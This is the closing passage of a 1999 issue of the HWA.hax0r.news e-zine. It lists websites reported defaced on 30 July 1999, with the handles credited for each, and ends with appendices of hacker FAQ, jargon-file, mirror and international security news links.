  11279.      be found here. (Thanx to Pine Security Digest for the initial report) 
  11280.      
  11281.      http://members.xoom.com/_XOOM/testr12/index.html
  11282.  
  11283.      
  11284.          
  11285.      http://www.attrition.org/
  11286.      
  11287.      Latest cracked pages courtesy of attrition.org
  11288.      
  11289.      
  11290.  
  11291.      [99.07.30]  [PrestoChango]      M   (pvrc) Hypermart (pvrc.hypermart.net)
  11292.      [99.07.30]  [Bazil Brush]           D3 Net (www.d3.net)
  11293.      [99.07.30]  [PhC]                   Qatar Net (QA) (www.qatar.net.qa)
  11294.      [99.07.30]  [Sistom]            M   Crystalg (www.crystalg.com)
  11295.      [99.07.30]  [LevelSeven]        M   Des Moines Metropolitan Transit Authority (www.dmmta.com)
  11296.      [99.07.30]  [HiP]                   Emerald Systems (www.emeraldsystems.com)
  11297.      [99.07.30]  [AntiChrist]            Rahulcom (www.rahulcom.com)
  11298.      [99.07.30]  [AntiChrist]            Rajeev Gandhi (www.rajeevgandhi.com)
  11299.      [99.07.30]  [AntiChrist]            Royal Soft India (www.royalsoftindia.com)
  11300.      [99.07.30]  [AntiChrist]            Ushauthup (www.ushauthup.com)
  11301.      [99.07.30]  [AntiChrist]            India Made (www.indiamade.com)
  11302.      [99.07.30]  [AntiChrist]            Insurvey (www.insurvey.com)
  11303.      [99.07.30]  [AntiChrist]            Integral Pictures (www.integralpictures.com)
  11304.      [99.07.30]  [AntiChrist]            Jeevanseva (www.jeevanseva.com)
  11305.      [99.07.30]  [AntiChrist]            Omshiv (www.omshiv.com)
  11306.      [99.07.30]  [AntiChrist]            Pankaj Group (www.pankajgroup.com)
  11307.      [99.07.30]  [AntiChrist]            Pannatex (www.pannatex.com)
  11308.      [99.07.30]  [AntiChrist]            PRG India (www.prgindia.com)
  11309.      [99.07.30]  [FL3M]                K Marlboro Edu (rocket-science.marlboro.edu)
  11310.      [99.07.30]  [AntiChrist]            Onsoft (www.onsoft.org)
  11311.      [99.07.30]  [AntiChrist]            Adiam (www.adiam.com)
  11312.      [99.07.30]  [AntiChrist]            Admanum (www.admanum.com)
  11313.      [99.07.30]  [AntiChrist]            AD Techmission (www.adtpl.com)
  11314.      [99.07.30]  [AntiChrist]            Always India (www.alwaysindia.com)
  11315.      [99.07.30]  [AntiChrist]            Aqua Hundred (www.aquahundred.com)
  11316.      [99.07.30]  [AntiChrist]            Big Ben India (www.bigbenindia.com)
  11317.      [99.07.30]  [AntiChrist]            Classic Export (www.classicexport.com)
  11318.      [99.07.30]  [AntiChrist]            Ezee Mart (www.ezeemart.com)
  11319.      [99.07.30]  [AntiChrist]            Kapadia Group of Industries (www.glassageind.com)
  11320.      [99.07.30]  [AntiChrist]            Inside Out Goa (www.insideoutgoa.com)
  11321.      [99.07.30]  [AntiChrist]            Mothay (www.mothay.com)
  11322.      [99.07.30]  [AntiChrist]          K Ronak Exports (www.ronakexports.com)
  11323.      [99.07.30]  [AntiChrist]            Singhi (www.singhi.com)
  11324.      [99.07.30]  [AntiChrist]            Stallen South Asia (www.stallenasia.com)
  11325.      [99.07.30]  [AntiChrist]            Taps1 (www.tapsl.com)
  11326.      [99.07.30]  [AntiChrist]            World Info Pages (www.worldinfopages.com)
  11327.      [99.07.30]  [FL3M]                  (redcom4) Navy (www.redcom4.navy.mil)
  11328.  
  11329.       (www.drugs.com) ,,,,,,,,,,,,,,,,,,,,,,Drugs.com 
  11330.       (www.infocenter.com)..................Internet Broadcasting Corp  
  11331.       (www.bigfish.com).....................Big Fish Records  
  11332.       (www.gay.be)..........................Belgium Service des Gays  
  11333.       (www.markmaker.com)...................Mark Maker 
  11334.       (www.milleniumworldmarathon.com) .....Millenium World Marathon 
  11335.       (www.mz.iao.fhg.de) ..................Fraunhofer-Institut fⁿr Arbeitswirtschaft und Organisation (IAO),
  11336.                                             UniversitΣt Stuttgart 
  11337.       (www.mpas.gov.br) ....................MinistΘrio da PrevidΩncia e AssistΩncia Social 
  11338.       (www.hazard.k12.ky.us) ...............Hazard School District 
  11339.       (www.northsalem.k12.ny.us) ...........North Salem School District 
  11340.       (www.paducah.k12.ky.us) ..............Paducah School District 
  11341.       (www.suckysucky.org)..................KRU
  11342.       (www.calcoast.com)....................California Coast Online Network  
  11343.       (www.lyrikal.com).....................The Lyrikal Krew  
  11344.       (nazarenes.mckinney.tx.us)............Nazarenes Church of McKinney Texas  
  11345.       (www.haplo.org).......................Web site of Matthew Jones  
  11346.  
  11347.       More cracks...      
  11348.       
  11349.       and more sites at the attrition cracked web sites mirror:
  11350.                    
  11351.                     http://www.attrition.org/mirror/attrition/index.html 
  11352.  
  11353.        -------------------------------------------------------------------------
  11354.        
  11355.   A.0                              APPENDICES
  11356.        _________________________________________________________________________
  11357.  
  11358.  
  11359.  
  11360.   A.1 PHACVW, sekurity, security, cyberwar links
  11361.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  11362.  
  11363.        The links are no longer maintained in this file, there is now a
  11364.       links section on the http://welcome.to/HWA.hax0r.news/ url so check
  11365.       there for current links etc.
  11366.  
  11367.       The hack FAQ (The #hack/alt.2600 faq)
  11368.       http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
  11369.       <a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
  11370.  
  11371.       Hacker's Jargon File (The quote file)
  11372.       http://www.lysator.liu.se/hackdict/split2/main_index.html
  11373.       <a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
  11374.  
  11375.       New Hacker's Jargon File.
  11376.       http://www.tuxedo.org/~esr/jargon/ 
  11377.       <a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
  11378.       
  11379.       
  11380.       HWA.hax0r.news Mirror Sites:
  11381.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  11382.       http://www.alldas.de/hwaidx1.htm ** NEW **
  11383.       http://www.csoft.net/~hwa/ 
  11384.       http://www.digitalgeeks.com/hwa.
  11385.       http://members.tripod.com/~hwa_2k
  11386.       http://welcome.to/HWA.hax0r.news/
  11387.       http://www.attrition.org/~modify/texts/zines/HWA/
  11388.       http://archives.projectgamma.com/zines/hwa/.  
  11389.       http://www.403-security.org/Htmls/hwa.hax0r.news.htm
  11390.  
  11391.  
  11392.       International links:(TBC)
  11393.       ~~~~~~~~~~~~~~~~~~~~~~~~~
  11394.  
  11395.       Foreign correspondants and others please send in news site links that
  11396.       have security news from foreign countries for inclusion in this list
  11397.       thanks... - Ed
  11398.  
  11399.       
  11400.           
  11401.       Belgium.......: http://bewoner.dma.be/cum/              
  11402.                       <a href="http://bewoner.dma.be/cum/">Go there</a> 
  11403.       
  11404.       Brasil........: http://www.psynet.net/ka0z              
  11405.                       <a href="http://www.psynet.net/ka0z/">Go there</a>
  11406.       
  11407.                       http://www.elementais.cjb.net           
  11408.                       <a href="http://www.elementais.cjb.net/">Go there</a>
  11409.       
  11410.       Canada .......: http://www.hackcanada.com
  11411.                       <a href="http://www.hackcanada.com/">Go there</a>
  11412.       
  11413.       Columbia......: http://www.cascabel.8m.com              
  11414.                       <a href="http://www.cascabel.8m.com/">Go there</a>
  11415.       
  11416.                       http://www.intrusos.cjb.net             
  11417.                       <a href="http://www.intrusos.cjb.net">Go there</a>
  11418.       
  11419.       Indonesia.....: http://www.k-elektronik.org/index2.html 
  11420.                       <a href="http://www.k-elektronik.org/index2.html">Go there</a>
  11421.       
  11422.                       http://members.xoom.com/neblonica/      
  11423.                       <a href="http://members.xoom.com/neblonica/">Go there</a>
  11424.       
  11425.                       http://hackerlink.or.id/                
  11426.                       <a href="http://hackerlink.or.id/">Go there</a>
  11427.       
  11428.       Netherlands...: http://security.pine.nl/                
  11429.                       <a href="http://security.pine.nl/">Go there</a>       
  11430.       
  11431.       Russia........: http://www.tsu.ru/~eugene/              
  11432.                       <a href="http://www.tsu.ru/~eugene/">Go there</a>
  11433.       
  11434.       Singapore.....: http://www.icepoint.com                 
  11435.                       <a href="http://www.icepoint.com">Go there</a>
  11436.                       
  11437.       Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
  11438.                       <a href="http://www.trscene.org/">Go there</a>              
  11439.  
  11440.     Got a link for this section? email it to hwa@press.usmc.net and i'll
  11441.     review it and post it here if it merits it.
  11442.  
  11443.     @HWA
  11444.     
  11445.  
  11446.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  11447.     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  11448.  
  11449.     ⌐ 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
  11450.     
  11451.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
  11452.      --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  11453.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  11454.    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  11455.        [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]    
  11456.  
  11457.  
  11458.